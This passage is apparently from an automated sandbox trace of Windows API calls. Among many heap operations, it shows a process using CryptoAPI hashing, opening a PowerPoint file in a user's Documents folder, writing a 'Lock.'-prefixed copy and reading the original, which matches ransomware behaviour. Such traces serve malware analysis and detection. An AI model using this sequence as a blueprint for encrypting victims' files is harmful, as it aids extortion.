lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyHash", lpUsedDefaultChar=0x0) returned 17 [0266.262] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9eb8 | out: hHeap=0x25c0000) returned 1 [0266.262] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3bc8 [0266.262] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e30 | out: hHeap=0x25c0000) returned 1 [0266.262] GetProcAddress (hModule=0x74d40000, lpProcName="CryptDestroyHash") returned 0x74d4df66 [0266.263] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3bc8 | out: hHeap=0x25c0000) returned 1 [0266.263] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0266.263] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9eb8 [0266.263] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2058 [0266.263] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0266.263] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9eb8 | out: hHeap=0x25c0000) returned 1 [0266.263] CryptDestroyHash (hHash=0xaa5660) returned 1 [0266.263] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x34a04b0 [0266.263] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2058 [0266.263] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16e8 [0266.263] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9eb8 [0266.263] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9678 [0266.263] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ee8 [0266.263] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1838 [0266.263] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ee8 | out: hHeap=0x25c0000) returned 1 [0266.263] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1838 | out: hHeap=0x25c0000) returned 1 [0266.263] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9678 | out: hHeap=0x25c0000) returned 1 [0266.263] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9678 [0266.263] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ee8 [0266.264] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa128 [0266.264] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1838 [0266.264] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa128 | out: hHeap=0x25c0000) returned 1 [0266.264] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1838 | out: hHeap=0x25c0000) returned 1 [0266.264] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ee8 | out: hHeap=0x25c0000) returned 1 [0266.264] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1468 | out: hHeap=0x25c0000) returned 1 [0266.264] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a8dc0 | out: hHeap=0x25c0000) returned 1 [0266.264] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acde0 | out: hHeap=0x25c0000) returned 1 [0266.264] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0266.264] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b40 | out: hHeap=0x25c0000) returned 1 [0266.264] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a95b8 | out: hHeap=0x25c0000) returned 1 [0266.264] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa080 | out: hHeap=0x25c0000) returned 1 [0266.267] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e28 | out: hHeap=0x25c0000) returned 1 [0266.267] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa950 | out: hHeap=0x25c0000) returned 1 [0266.267] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aaec0 | out: hHeap=0x25c0000) returned 1 [0266.267] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9de0 | out: hHeap=0x25c0000) returned 1 [0266.267] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fd8 | out: hHeap=0x25c0000) returned 1 [0266.267] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3ab0 | out: hHeap=0x25c0000) returned 1 [0266.267] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9eb8 | out: hHeap=0x25c0000) returned 1 [0266.270] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9678 | out: hHeap=0x25c0000) returned 1 [0266.270] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0266.270] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16e8 | out: hHeap=0x25c0000) returned 1 [0266.270] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a04b0 | out: hHeap=0x25c0000) returned 1 [0266.270] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9648 | out: hHeap=0x25c0000) returned 1 [0266.270] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa908 | out: hHeap=0x25c0000) returned 1 [0266.270] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1b8 | out: hHeap=0x25c0000) returned 1 [0266.270] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e88 | out: hHeap=0x25c0000) returned 1 [0266.270] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa200 | out: hHeap=0x25c0000) returned 1 [0266.270] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1e8 | out: hHeap=0x25c0000) returned 1 [0266.270] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa038 | out: hHeap=0x25c0000) returned 1 [0266.270] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa968 | out: hHeap=0x25c0000) returned 1 [0266.270] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9cd8 | out: hHeap=0x25c0000) returned 1 [0266.270] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0e0 | out: hHeap=0x25c0000) returned 1 [0266.270] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa020 | out: hHeap=0x25c0000) returned 1 [0266.270] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa830 | out: hHeap=0x25c0000) returned 1 [0266.271] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac9f0 | out: hHeap=0x25c0000) returned 1 [0266.271] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9a68 | out: hHeap=0x25c0000) returned 1 [0266.271] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9708 | out: hHeap=0x25c0000) returned 1 [0266.271] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f60 | out: hHeap=0x25c0000) returned 1 [0266.271] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f30 | out: hHeap=0x25c0000) returned 1 [0266.271] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c48 | out: hHeap=0x25c0000) returned 1 [0266.271] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa9b0 | out: hHeap=0x25c0000) returned 1 [0266.271] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e70 | out: hHeap=0x25c0000) returned 1 [0266.271] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0266.271] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0266.271] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16e8 [0266.271] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e70 [0266.271] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa9b0 [0266.271] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2058 [0266.271] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0266.271] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c48 [0266.271] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2058 [0266.271] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f30 [0266.271] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f60 [0266.272] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2da8 [0266.272] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9708 [0266.272] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0266.272] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9708 | out: hHeap=0x25c0000) returned 1 [0266.272] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f60 | out: hHeap=0x25c0000) returned 1 [0266.272] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f30 | out: hHeap=0x25c0000) returned 1 [0266.272] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0266.272] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f30 [0266.272] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2058 [0266.272] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0266.272] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa9b0 | out: hHeap=0x25c0000) returned 1 [0266.272] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c48 | out: hHeap=0x25c0000) returned 1 [0266.272] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f30 | out: hHeap=0x25c0000) returned 1 [0266.272] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e70 | out: hHeap=0x25c0000) returned 1 [0266.272] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16e8 | out: hHeap=0x25c0000) returned 1 [0266.272] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8a0 | out: hHeap=0x25c0000) returned 1 [0266.272] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa920 | out: hHeap=0x25c0000) returned 1 [0266.272] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa7e8 | out: hHeap=0x25c0000) returned 1 [0266.272] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6b70 | out: hHeap=0x25c0000) returned 1 [0266.273] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2c18 | out: hHeap=0x25c0000) returned 1 [0266.273] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c88 | out: hHeap=0x25c0000) returned 1 [0266.273] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8c0 | out: hHeap=0x25c0000) returned 1 [0266.273] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18b8 | out: hHeap=0x25c0000) returned 1 [0266.273] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249f1d0 | out: hHeap=0x25c0000) returned 1 [0266.273] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2060 | out: hHeap=0x25c0000) returned 1 [0266.273] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2080 | out: hHeap=0x25c0000) returned 1 [0266.273] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466df0 | out: hHeap=0x25c0000) returned 1 [0266.273] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ed0 | out: hHeap=0x25c0000) returned 1 [0266.273] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6cd8 | out: hHeap=0x25c0000) returned 1 [0266.273] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18d8 | out: hHeap=0x25c0000) returned 1 [0266.273] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c60 | out: hHeap=0x25c0000) returned 1 [0266.273] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0b0 | out: hHeap=0x25c0000) returned 1 [0266.273] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a08 | out: hHeap=0x25c0000) returned 1 [0266.273] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ce8 | out: hHeap=0x25c0000) returned 1 [0266.273] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b69e0 | out: hHeap=0x25c0000) returned 1 [0266.273] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa248 | out: hHeap=0x25c0000) returned 1 [0266.273] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ca8 | out: hHeap=0x25c0000) returned 1 [0266.273] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a95d0 | out: hHeap=0x25c0000) returned 1 [0266.273] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa860 | out: hHeap=0x25c0000) returned 1 [0266.274] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fa8 | out: hHeap=0x25c0000) returned 1 [0266.274] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9cc0 | out: hHeap=0x25c0000) returned 1 [0266.274] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466dd0 | out: hHeap=0x25c0000) returned 1 [0266.274] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2150 | out: hHeap=0x25c0000) returned 1 [0266.274] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0288 | out: hHeap=0x25c0000) returned 1 [0266.274] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f78 | out: hHeap=0x25c0000) returned 1 [0266.274] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6468 | out: hHeap=0x25c0000) returned 1 [0266.274] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1428 | out: hHeap=0x25c0000) returned 1 [0266.274] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b64e0 | out: hHeap=0x25c0000) returned 1 [0266.274] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9420 | out: hHeap=0x25c0000) returned 1 [0266.274] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6b48 | out: hHeap=0x25c0000) returned 1 [0266.274] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1438 | out: hHeap=0x25c0000) returned 1 [0266.274] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a80 | out: hHeap=0x25c0000) returned 1 [0266.274] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c00 | out: hHeap=0x25c0000) returned 1 [0266.274] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6be8 | out: hHeap=0x25c0000) returned 1 [0266.274] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2de8 | out: hHeap=0x25c0000) returned 1 [0266.274] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6aa8 | out: hHeap=0x25c0000) returned 1 [0266.274] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9df8 | out: hHeap=0x25c0000) returned 1 [0266.274] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3a88 | out: hHeap=0x25c0000) returned 1 [0266.274] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c98 | out: hHeap=0x25c0000) returned 1 [0266.275] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c10 | out: hHeap=0x25c0000) returned 1 [0266.275] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f18 | out: hHeap=0x25c0000) returned 1 [0266.275] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6440 | out: hHeap=0x25c0000) returned 1 [0266.275] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2415a18 | out: hHeap=0x25c0000) returned 1 [0266.275] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3bf0 | out: hHeap=0x25c0000) returned 1 [0266.275] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b70 | out: hHeap=0x25c0000) returned 1 [0266.275] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1778 | out: hHeap=0x25c0000) returned 1 [0266.275] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0266.275] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa740 | out: hHeap=0x25c0000) returned 1 [0266.275] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8a8 | out: hHeap=0x25c0000) returned 1 [0266.275] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0266.275] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2bb8 [0266.275] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0266.275] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0266.275] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0266.275] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2bb8 [0266.276] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9af8 [0266.276] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e10 [0266.276] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ba8 [0266.276] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9570 [0266.276] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents/XeFrXnKCfR10wVvY0.pptx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\xefrxnkcfr10wvvy0.pptx"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2d0 [0266.283] SetFilePointerEx (in: hFile=0x2d0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0266.283] SetFilePointerEx (in: hFile=0x2d0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x8bf2c8 | out: lpNewFilePointer=0x0) returned 1 [0266.283] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x14) returned 0x2466dd0 [0266.283] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0266.283] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1708 [0266.283] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0266.283] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0266.283] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1708 [0266.283] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab310 [0266.283] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aca50 [0266.283] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2bb8 [0266.284] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9af8 [0266.284] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents/Lock.XeFrXnKCfR10wVvY0.pptx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\lock.xefrxnkcfr10wvvy0.pptx"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2c8 [0266.284] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x14) returned 0x2466df0 [0266.285] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0266.285] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c28 [0266.285] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0266.285] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0266.285] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d820 [0266.285] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0266.285] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c28 [0266.285] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ac978 [0266.285] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d50 [0266.285] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1708 [0266.285] SetFilePointerEx (in: hFile=0x2d0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x8bf4ec | out: lpNewFilePointer=0x0) returned 1 [0266.285] ReadFile (in: hFile=0x2d0, lpBuffer=0x3551008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8bf500, lpOverlapped=0x0 | out: lpBuffer=0x3551008*, lpNumberOfBytesRead=0x8bf500*=0x44ea, lpOverlapped=0x0) returned 1 [0266.287] ReadFile (in: hFile=0x2d0, lpBuffer=0x3551008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8bf500, lpOverlapped=0x0 | out: lpBuffer=0x3551008*, lpNumberOfBytesRead=0x8bf500*=0x0, lpOverlapped=0x0) returned 1 [0266.287] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0266.287] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1708 [0266.288] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a96d8 [0266.288] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1a0 [0266.288] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c28 [0266.289] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1778 [0266.289] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x44ea) returned 0x3575510 [0266.289] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0266.289] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1708 [0266.290] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1778 [0266.290] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466e30 [0266.291] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0266.291] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1708 [0266.291] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3bf0 [0266.294] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1778 [0266.304] CharUpperBuffW (in: lpsz="A6000504F44", cchLength=0xb | out: lpsz="A6000504F44") returned 0xb [0266.304] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3bf0 | out: hHeap=0x25c0000) returned 1 [0266.304] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1778 | out: hHeap=0x25c0000) returned 1 [0266.304] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a96d8 [0266.304] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1) returned 0x24b1778 [0266.304] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1a0 [0266.304] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ac978 [0266.304] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c28 [0266.304] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c98 [0266.304] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x44ea) returned 0x3575510 [0266.304] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0266.304] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1) returned 0x24b1c28 [0266.304] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab310 [0266.304] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2de8 [0266.304] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2de8 | out: hHeap=0x25c0000) returned 1 [0266.304] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1) returned 0x24b2de8 [0266.304] 